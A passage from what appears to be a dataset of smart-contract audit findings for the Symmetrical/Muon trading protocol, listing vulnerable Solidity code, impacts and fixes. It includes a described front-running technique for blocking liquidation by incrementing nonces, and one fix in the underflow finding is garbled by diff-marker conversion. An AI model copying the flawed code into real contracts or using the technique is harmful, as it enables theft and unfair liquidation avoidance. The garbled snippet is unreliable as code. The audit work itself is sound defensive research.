MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, ""LibMuon: Invalid length"");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n+ ""verifyPrices"",\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n","Signatures can be reused due to hash collisions, through illegal signatures, using illegal `unpl`, etc","```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, ""LibMuon: Invalid length"");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n" +`depositAndAllocateForPartyB` is broken due to incorrect precision,high,"Due to incorrect precision, any users or external protocols utilizing the `depositAndAllocateForPartyB` to allocate 1000 USDC will end up only having 0.000000001 USDC allocated to their account. This might potentially lead to unexpected loss of funds due to the broken functionality if they rely on the accuracy of the function outcome to perform certain actions that deal with funds/assets.\\nThe input `amount` of the `depositForPartyB` function must be in native precision (e.g. USDC should be 6 decimals) as the function will automatically scale the `amount` to 18 precision in Lines 114-115 below.\\n```\\nFile: AccountFacetImpl.sol\\n function depositForPartyB(uint256 amount) internal {\\n IERC20(GlobalAppStorage.layout().collateral).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountStorage.layout().balances[msg.sender] += amountWith18Decimals;\\n }\\n```\\n\\nOn the other hand, the input `amount` of `allocateForPartyB` function must be in 18 decimals precision. Within the protocol, it uses 18 decimals for internal accounting.\\n```\\nFile: AccountFacetImpl.sol\\n function allocateForPartyB(uint256 amount, address partyA, bool increaseNonce) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n require(accountLayout.balances[msg.sender] >= amount, ""PartyBFacet: Insufficient balance"");\\n require(\\n !MAStorage.layout().partyBLiquidationStatus[msg.sender][partyA],\\n ""PartyBFacet: PartyB isn't solvent""\\n );\\n if (increaseNonce) {\\n accountLayout.partyBNonces[msg.sender][partyA] += 1;\\n }\\n accountLayout.balances[msg.sender] -= amount;\\n accountLayout.partyBAllocatedBalances[msg.sender][partyA] += amount;\\n }\\n```\\n\\nThe `depositAndAllocateForPartyB` function allows the users to deposit and allocate to their accounts within a single transaction. Within the function, it calls the `depositForPartyB` function followed by the `allocateForPartyB` function. The function passes the same `amount` into both the `depositForPartyB` and `allocateForPartyB` functions. However, the problem is that one accepts `amount` in native precision (e.g. 6 decimals) while the other accepts `amount` in scaled decimals (e.g. 18 decimals).\\nAssume that Alice calls the `depositAndAllocateForPartyB` function and intends to deposit and allocate 1000 USDC. Thus, she set the `amount` of the `depositAndAllocateForPartyB` function to `1000e6` as the precision of USDC is `6`.\\nThe `depositForPartyB` function at Line 78 will work as intended because it will automatically be scaled up to internal accounting precision (18 decimals) within the function, and 1000 USDC will be deposited to her account.\\nThe `allocateForPartyB` at Line 79 will not work as intended. The function expects the `amount` to be in internal accounting precision (18 decimals), but an `amount` in native precision (6 decimals for USDC) is passed in. As a result, only 0.000000001 USDC will be allocated to her account.\\n```\\nFile: AccountFacet.sol\\n function depositAndAllocateForPartyB(\\n uint256 amount,\\n address partyA\\n ) external whenNotPartyBActionsPaused onlyPartyB {\\n AccountFacetImpl.depositForPartyB(amount);\\n AccountFacetImpl.allocateForPartyB(amount, partyA, true);\\n emit DepositForPartyB(msg.sender, amount);\\n emit AllocateForPartyB(msg.sender, partyA, amount);\\n }\\n```\\n","Scale the `amount` to internal accounting precision (18 decimals) before passing it to the `allocateForPartyB` function.\\n```\\nfunction depositAndAllocateForPartyB(\\n uint256 amount,\\n address partyA\\n) external whenNotPartyBActionsPaused onlyPartyB {\\n AccountFacetImpl.depositForPartyB(amount);\\n// Add the line below\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n// Add the line below\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n// Remove the line below\\n AccountFacetImpl.allocateForPartyB(amount, partyA, true);\\n// Add the line below\\n AccountFacetImpl.allocateForPartyB(amountWith18Decimals, partyA, true);\\n emit DepositForPartyB(msg.sender, amount);\\n emit AllocateForPartyB(msg.sender, partyA, amount);\\n}\\n```\\n","Any users or external protocols utilizing the `depositAndAllocateForPartyB` to allocate 1000 USDC will end up only having 0.000000001 USDC allocated to their account, which might potentially lead to unexpected loss of funds due to the broken functionality if they rely on the accuracy of the outcome to perform certain actions dealing with funds/assets.\\nFor instance, Bob's account is close to being liquidated. Thus, he might call the `depositAndAllocateForPartyB` function in an attempt to increase its allocated balance and improve its account health level to avoid being liquidated. However, the `depositAndAllocateForPartyB` is not working as expected, and its allocated balance only increased by a very small amount (e.g. 0.000000001 USDC in our example). Bob believed that his account was healthy, but in reality, his account was still in danger as it only increased by 0.000000001 USDC. In the next one or two blocks, the price swung, and Bob's account was liquidated.","```\\nFile: AccountFacetImpl.sol\\n function depositForPartyB(uint256 amount) internal {\\n IERC20(GlobalAppStorage.layout().collateral).safeTransferFrom(\\n msg.sender,\\n address(this),\\n amount\\n );\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountStorage.layout().balances[msg.sender] += amountWith18Decimals;\\n }\\n```\\n" +Accounting error in PartyB's pending locked balance led to loss of funds,high,"Accounting error in the PartyB's pending locked balance during the partial filling of a position could lead to a loss of assets for PartyB.\\n```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n..SNIP..\\n quoteLayout.quoteIdsOf[quote.partyA].push(currentId);\\n..SNIP..\\n } else {\\n accountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n filledLockedValues\\n );\\n }\\n```\\n\\nParameter Description\\n$quote_{current}$ Current quote (Quote ID = 1)\\n$quote_{new}$ Newly created quote (Quote ID = 2) due to partially filling\\n$lockedValue_{total}$ 100 USD. The locked values of $quote_{current}$\\n$lockedValue_{filled}$ 30 USD. $lockedValue_{filled} = lockedValue_{total}\\times\\frac{filledAmount}{quote.quantity}$\\n$lockedValue_{unfilled}$ 70 USD. $lockedValue_{unfilled} = lockedValue_{total}-lockedValue_{filled}$\\n$pendingLockedBalance_{a}$ 100 USD. PartyA's pending locked balance\\n$pendingLockedBalance_{b}$ 100 USD. PartyB's pending locked balance\\n$pendingQuotes_a$ PartyA's pending quotes. $pendingQuotes_a = [quote_{current}]$\\n$pendingQuotes_b$ PartyB's pending quotes. $pendingQuotes_b = [quote_{current}]$\\nAssume the following states before the execution of the `openPosition` function:\\n$pendingQuotes_a = [quote_{current}]$\\n$pendingQuotes_b = [quote_{current}]$\\n$pendingLockedBalance_{a} = 100\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nWhen the `openPosition` function is executed, $quote_{current}$ will be removed from $pendingQuotes_a$ and $pendingQuotes_b$ in Line 156.\\nIf the position is partially filled, $quote_{current}$ will be filled, and $quote_{new}$ will be created with the unfilled amount ($lockedValue_{unfilled}$). The $quote_{new}$ is automatically added to PartyA's pending quote list in Line 225.\\nThe states at this point are as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 100\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nLine 238 removes the balance already filled ($lockedValue_{filled}$) from $pendingLockedBalance_{a}$ . The unfilled balance ($lockedValue_{unfilled}$) does not need to be removed from $pendingLockedBalance_{a}$ because it is now the balance of $quote_{new}$ that belong to PartyA. The value in $pendingLockedBalance_a$ is correct.\\nThe states at this point are as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 70\\ USD$\\n$pendingLockedBalance_{b} = 100\\ USD$\\nIn Line 239, the code removes the balance already filled ($lockedValue_{filled}$) from $pendingLockedBalance_{b}$\\nThe end state is as follows:\\n$pendingQuotes_a = [quote_{new}]$\\n$pendingQuotes_b = []$\\n$pendingLockedBalance_{a} = 70\\ USD$\\n$pendingLockedBalance_{b} = 70\\ USD$\\nAs shown above, the value of $pendingLockedBalance_{b}$ is incorrect. Even though PartyB has no pending quote, 70 USD is still locked in the pending balance.\\nThere are three (3) important points to note:\\n$quote_{current}$ has already been removed from $pendingQuotes_b$ in Line 156\\n$quote_{new}$ is not automatically added to $pendingQuotes_b$. When $quote_{new}$ is created, it is not automatically locked to PartyB.\\n$pendingQuotes_b$ is empty\\nAs such, $lockedValue_{total}$ should be removed from the $pendingLockedBalance_{b}$ instead of only $lockedvalue_{filled}$.",Update the affected function to remove $lockedValue_{total}$ from the $pendingLockedBalance_{b}$ instead of only $lockedvalue_{filled}$.\\n```\\naccountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\naccountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n// Remove the line below\\n filledLockedValues\\n// Add the line below\\n quote.lockedValues\\n);\\n```\\n,"Every time PartyB partially fill a position, their $pendingLockedBalance_b$ will silently increase and become inflated. The pending locked balance plays a key role in the protocol's accounting system. Thus, an error in the accounting breaks many of the computations and invariants of the protocol.\\nFor instance, it is used to compute the available balance of an account in `partyBAvailableForQuote` function. Assuming that the allocated balance remains the same. If the pending locked balance increases silently due to the bug, the available balance returned from the `partyBAvailableForQuote` function will decrease. Eventually, it will ""consume"" all the allocated balance, and there will be no available funds left for PartyB to open new positions or to deallocate+withdraw funds. Thus, leading to lost of assets for PartyB.","```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n..SNIP..\\n quoteLayout.quoteIdsOf[quote.partyA].push(currentId);\\n..SNIP..\\n } else {\\n accountLayout.pendingLockedBalances[quote.partyA].sub(filledLockedValues);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].sub(\\n filledLockedValues\\n );\\n }\\n```\\n" +Liquidation can be blocked by incrementing the nonce,high,"Malicious users could block liquidators from liquidating their accounts, which creates unfairness in the system and lead to a loss of profits to the counterparty.\\nInstance 1 - Blocking liquidation of PartyA\\nA liquidatable PartyA can block liquidators from liquidating its account.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyA(address partyA, SingleUpnlSig memory upnlSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n\\n LibMuon.verifyPartyAUpnl(upnlSig, partyA);\\n int256 availableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnl,\\n partyA\\n );\\n require(availableBalance < 0, ""LiquidationFacet: PartyA is solvent"");\\n maLayout.liquidationStatus[partyA] = true;\\n maLayout.liquidationTimestamp[partyA] = upnlSig.timestamp;\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n }\\n```\\n\\nWithin the `liquidatePartyA` function, it calls the `LibMuon.verifyPartyAUpnl` function.\\n```\\nFile: LibMuon.sol\\n function verifyPartyAUpnl(SingleUpnlSig memory upnlSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n// require(\\n// block.timestamp <= upnlSig.timestamp + muonLayout.upnlValidTime,\\n// ""LibMuon: Expired signature""\\n// );\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n upnlSig.reqId,\\n address(this),\\n partyA,\\n AccountStorage.layout().partyANonces[partyA],\\n upnlSig.upnl,\\n upnlSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, upnlSig.sigs, upnlSig.gatewaySignature);\\n }\\n```\\n\\nThe `verifyPartyAUpnl` function will take the current nonce of PartyA (AccountStorage.layout().partyANonces[partyA]) to build the hash needed for verification.\\nWhen the PartyA becomes liquidatable or near to becoming liquidatable, it could start to monitor the mempool for any transaction that attempts to liquidate their accounts. Whenever a liquidator submits a `liquidatePartyA` transaction to liquidate their accounts, they could front-run it and submit a transaction to increment their nonce. When the liquidator's transaction is executed, the on-chain PartyA's nonce will differ from the nonce in the signature, and the liquidation transaction will revert.\\nFor those chains that do not have a public mempool, they can possibly choose to submit a transaction that increments their nonce in every block as long as it is economically feasible to obtain the same result.\\nGas fees that PartyA spent might be cheap compared to the number of assets they will lose if their account is liquidated. Additionally, gas fees are cheap on L2 or side-chain (The protocol intended to support Arbitrum One, Arbitrum Nova, Fantom, Optimism, BNB chain, Polygon, Avalanche as per the contest details).\\nThere are a number of methods for PartyA to increment their nonce, this includes but not limited to the following:\\nAllocate or deallocate dust amount\\nLock and unlock the dummy position\\nCalls `requestToClosePosition` followed by `requestToCancelCloseRequest` immediately\\nInstance 2 - Blocking liquidation of PartyB\\nThe same exploit can be used to block the liquidation of PartyB since the `liquidatePartyB` function also relies on the `LibMuon.verifyPartyBUpnl,` which uses the on-chain nonce of PartyB for signature verification.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n LibMuon.verifyPartyBUpnl(upnlSig, partyB, partyA);\\n```\\n","In most protocols, whether an account is liquidatable is determined on-chain, and this issue will not surface. However, the architecture of Symmetrical protocol relies on off-chain and on-chain components to determine if an account is liquidatable, which can introduce a number of race conditions such as the one mentioned in this report.\\nConsider reviewing the impact of malicious users attempting to increment the nonce in order to block certain actions in the protocols since most functions rely on the fact that the on-chain nonce must be in sync with the signature's nonce and update the architecture/contracts of the protocol accordingly.","PartyA can block their accounts from being liquidated by liquidators. With the ability to liquidate the insolvent PartyA, the unrealized profits of all PartyBs cannot be realized, and thus they will not be able to withdraw the profits.\\nPartyA could also exploit this issue to block their account from being liquidated to:\\nWait for their positions to recover to reduce their losses\\nBuy time to obtain funds from elsewhere to inject into their accounts to bring the account back to a healthy level\\nSince this is a zero-sum game, the above-mentioned create unfairness to PartyB and reduce their profits.\\nThe impact is the same for the blocking of PartyB liquidation.","```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyA(address partyA, SingleUpnlSig memory upnlSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n\\n LibMuon.verifyPartyAUpnl(upnlSig, partyA);\\n int256 availableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnl,\\n partyA\\n );\\n require(availableBalance < 0, ""LiquidationFacet: PartyA is solvent"");\\n maLayout.liquidationStatus[partyA] = true;\\n maLayout.liquidationTimestamp[partyA] = upnlSig.timestamp;\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n }\\n```\\n" +Liquidation of PartyA will fail due to underflow errors,high,"Liquidation of PartyA will fail due to underflow errors. As a result, assets will be stuck, and there will be a loss of assets for the counterparty (the creditor) since they cannot receive the liquidated assets.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePositionsPartyA(\\n address partyA,\\n uint256[] memory quoteIds\\n ) internal returns (bool) {\\n..SNIP..\\n (bool hasMadeProfit, uint256 amount) = LibQuote.getValueOfQuoteForPartyA(\\n accountLayout.symbolsPrices[partyA][quote.symbolId].price,\\n LibQuote.quoteOpenAmount(quote),\\n quote\\n );\\n..SNIP..\\n if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NORMAL\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += quote\\n .lockedValues\\n .cva;\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.LATE\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * accountLayout.liquidationDetails[partyA].deficit) /\\n accountLayout.lockedBalances[partyA].cva);\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.OVERDUE\\n ) {\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n amount -\\n ((amount * accountLayout.liquidationDetails[partyA].deficit) /\\n uint256(-accountLayout.liquidationDetails[partyA].totalUnrealizedLoss));\\n }\\n }\\n```\\n\\nAssume that at this point, the allocated balance of PartyB (accountLayout.partyBAllocatedBalances[quote.partyB][partyA]) only has 1000 USD.\\nIn Line 152 above, the `getValueOfQuoteForPartyA` function is called to compute the PnL of a position. Assume the position has a huge profit of 3000 USD due to a sudden spike in price. For this particular position, PartyA will profit 3000 USD while PartyB will lose 3000 USD.\\nIn this case, 3000 USD needs to be deducted from PartyB's account. However, when the `accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;` code at Line 170, 182, or 190 gets executed, an underflow error will occur, and the transaction will revert. This is because `partyBAllocatedBalances` is an unsigned integer, and PartyB only has 1000 USD of allocated balance, but the code attempts to deduct 3000 USD.",Consider implementing the following fixes to ensure that the amount to be deducted will never exceed the allocated balance of PartyB to prevent underflow errors from occurring.\\n```\\nif (hasMadeProfit) {\\n// Add the line below\\n amountToDeduct = amount > accountLayout.partyBAllocatedBalances[quote.partyB][partyA] ? accountLayout.partyBAllocatedBalances[quote.partyB][partyA] : amount\\n// Add the line below\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Remove the line below\\n= amountToDeduct\\n// Remove the line below\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Remove the line below\\n= amount;\\n} else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] // Add the line below\\n= amount;\\n}\\n```\\n,"Liquidation of PartyA will fail. Since liquidation cannot be completed, the assets that are liable to be liquidated cannot be transferred from PartyA (the debtor) to the counterparty (the creditor). Assets will be stuck, and there will be a loss of assets for the counterparty (the creditor) since they cannot receive the liquidated assets.","```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePositionsPartyA(\\n address partyA,\\n uint256[] memory quoteIds\\n ) internal returns (bool) {\\n..SNIP..\\n (bool hasMadeProfit, uint256 amount) = LibQuote.getValueOfQuoteForPartyA(\\n accountLayout.symbolsPrices[partyA][quote.symbolId].price,\\n LibQuote.quoteOpenAmount(quote),\\n quote\\n );\\n..SNIP..\\n if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NORMAL\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += quote\\n .lockedValues\\n .cva;\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.LATE\\n ) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * accountLayout.liquidationDetails[partyA].deficit) /\\n accountLayout.lockedBalances[partyA].cva);\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] += amount;\\n }\\n } else if (\\n accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.OVERDUE\\n ) {\\n if (hasMadeProfit) {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] -= amount;\\n } else {\\n accountLayout.partyBAllocatedBalances[quote.partyB][partyA] +=\\n amount -\\n ((amount * accountLayout.liquidationDetails[partyA].deficit) /\\n uint256(-accountLayout.liquidationDetails[partyA].totalUnrealizedLoss));\\n }\\n }\\n```\\n" +Liquidating pending quotes doesn't return trading fee to party A,medium,"When a user is liquidated, the trading fees of the pending quotes aren't returned.\\nWhen a pending/locked quote is canceled, the trading fee is sent back to party A, e.g.\\nBut, when a pending quote is liquidated, the trading fee is not used for the liquidation. Instead, the fee collector keeps the funds:\\n```\\n function liquidatePendingPositionsPartyA(address partyA) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n require(\\n MAStorage.layout().liquidationStatus[partyA],\\n ""LiquidationFacet: PartyA is solvent""\\n );\\n for (uint256 index = 0; index < quoteLayout.partyAPendingQuotes[partyA].length; index++) {\\n Quote storage quote = quoteLayout.quotes[\\n quoteLayout.partyAPendingQuotes[partyA][index]\\n ];\\n if (\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING) &&\\n quoteLayout.partyBPendingQuotes[quote.partyB][partyA].length > 0\\n ) {\\n delete quoteLayout.partyBPendingQuotes[quote.partyB][partyA];\\n AccountStorage\\n .layout()\\n .partyBPendingLockedBalances[quote.partyB][partyA].makeZero();\\n }\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n quote.modifyTimestamp = block.timestamp;\\n }\\n AccountStorage.layout().pendingLockedBalances[partyA].makeZero();\\n delete quoteLayout.partyAPendingQuotes[partyA];\\n }\\n```\\n\\n```\\n function liquidatePartyB(\\n address partyB,\\n address partyA,\\n SingleUpnlSig memory upnlSig\\n ) internal {\\n // // rest of code\\n uint256[] storage pendingQuotes = quoteLayout.partyAPendingQuotes[partyA];\\n\\n for (uint256 index = 0; index < pendingQuotes.length; ) {\\n Quote storage quote = quoteLayout.quotes[pendingQuotes[index]];\\n if (\\n quote.partyB == partyB &&\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING)\\n ) {\\n accountLayout.pendingLockedBalances[partyA].subQuote(quote);\\n\\n pendingQuotes[index] = pendingQuotes[pendingQuotes.length - 1];\\n pendingQuotes.pop();\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n quote.modifyTimestamp = block.timestamp;\\n } else {\\n index++;\\n }\\n }\\n```\\n\\nThese funds should be used to cover the liquidation. Since no trade has been executed, the fee collector shouldn't earn anything.","return the funds to party A. If party A is being liquidated, use the funds to cover the liquidation. Otherwise, party A keeps the funds.","Liquidation doesn't use paid trading fees to cover outstanding balances. Instead, the funds are kept by the fee collector.","```\\n function liquidatePendingPositionsPartyA(address partyA) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n require(\\n MAStorage.layout().liquidationStatus[partyA],\\n ""LiquidationFacet: PartyA is solvent""\\n );\\n for (uint256 index = 0; index < quoteLayout.partyAPendingQuotes[partyA].length; index++) {\\n Quote storage quote = quoteLayout.quotes[\\n quoteLayout.partyAPendingQuotes[partyA][index]\\n ];\\n if (\\n (quote.quoteStatus == QuoteStatus.LOCKED ||\\n quote.quoteStatus == QuoteStatus.CANCEL_PENDING) &&\\n quoteLayout.partyBPendingQuotes[quote.partyB][partyA].length > 0\\n ) {\\n delete quoteLayout.partyBPendingQuotes[quote.partyB][partyA];\\n AccountStorage\\n .layout()\\n .partyBPendingLockedBalances[quote.partyB][partyA].makeZero();\\n }\\n quote.quoteStatus = QuoteStatus.LIQUIDATED;\\n quote.modifyTimestamp = block.timestamp;\\n }\\n AccountStorage.layout().pendingLockedBalances[partyA].makeZero();\\n delete quoteLayout.partyAPendingQuotes[partyA];\\n }\\n```\\n" +In case if trading fee will be changed then refund will be done with wrong amount,medium,"In case if trading fee will be changed then refund will be done with wrong amount\\nWhen user creates quote, then he pays trading fees. Amount that should be paid is calculated inside `LibQuote.getTradingFee` function.\\n```\\n function getTradingFee(uint256 quoteId) internal view returns (uint256 fee) {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n Symbol storage symbol = SymbolStorage.layout().symbols[quote.symbolId];\\n if (quote.orderType == OrderType.LIMIT) {\\n fee =\\n (LibQuote.quoteOpenAmount(quote) * quote.requestedOpenPrice * symbol.tradingFee) /\\n 1e36;\\n } else {\\n fee = (LibQuote.quoteOpenAmount(quote) * quote.marketPrice * symbol.tradingFee) / 1e36;\\n }\\n }\\n```\\n\\nAs you can see `symbol.tradingFee` is used to determine fee amount. This fee can be changed any time.\\nWhen order is canceled, then fee should be returned to user. This function also uses `LibQuote.getTradingFee` function to calculate fee to return.\\nSo in case if order was created before fee changes, then returned amount will be not same, when it is canceled after fee changes.",You can store fee paid by user inside quote struct. And when canceled return that amount.,User or protocol losses portion of funds.,```\\n function getTradingFee(uint256 quoteId) internal view returns (uint256 fee) {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n Symbol storage symbol = SymbolStorage.layout().symbols[quote.symbolId];\\n if (quote.orderType == OrderType.LIMIT) {\\n fee =\\n (LibQuote.quoteOpenAmount(quote) * quote.requestedOpenPrice * symbol.tradingFee) /\\n 1e36;\\n } else {\\n fee = (LibQuote.quoteOpenAmount(quote) * quote.marketPrice * symbol.tradingFee) / 1e36;\\n }\\n }\\n```\\n +lockQuote() increaseNonce parameters do not work properly,medium,"in `lockQuote()` will execute `partyBNonces[quote.partyB][quote.partyA] += 1` if increaseNonce == true But this operation is executed before setting `quote.partyB`, resulting in actually setting `partyBNonces[address(0)][quote.partyA] += 1`\\nin `lockQuote()` , when execute `partyBNonces[quote.partyB][quote.partyA] += 1` , `quote.paryB` is address(0)\\n```\\n function lockQuote(uint256 quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\n\\nactually setting `partyBNonces[address(0)][quote.partyA] += 1`","```\\n function lockQuote(uint256 quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n- accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n+ accountLayout.partyBNonces[msg.sender][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\n",increaseNonce parameters do not work properly,"```\\n function lockQuote(uint256 quoteId, SingleUpnlSig memory upnlSig, bool increaseNonce) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n Quote storage quote = quoteLayout.quotes[quoteId];\\n LibMuon.verifyPartyBUpnl(upnlSig, msg.sender, quote.partyA);\\n checkPartyBValidationToLockQuote(quoteId, upnlSig.upnl);\\n if (increaseNonce) {\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n }\\n quote.modifyTimestamp = block.timestamp;\\n quote.quoteStatus = QuoteStatus.LOCKED;\\n quote.partyB = msg.sender;\\n // lock funds for partyB\\n accountLayout.partyBPendingLockedBalances[msg.sender][quote.partyA].addQuote(quote);\\n quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\n" +Wrong calculation of solvency after request to close and after close position,medium,"`isSolventAfterClosePosition` and `isSolventAfterRequestToClosePosition` do not account for the extra profit that the user would get from closing the position.\\nWhen a party A creates a request for closing a position, the `isSolventAfterRequestToClosePosition` function is called to check if the user is solvent after the request. In the same way, when someone tries to close a position, the `isSolventAfterClosePosition` function is called to check if both party A and party B are solvent after closing the position.\\nBoth functions calculate the available balance for party A and party B, and revert if it is lower than zero. After that, the function accounts for the the extra loss that the user 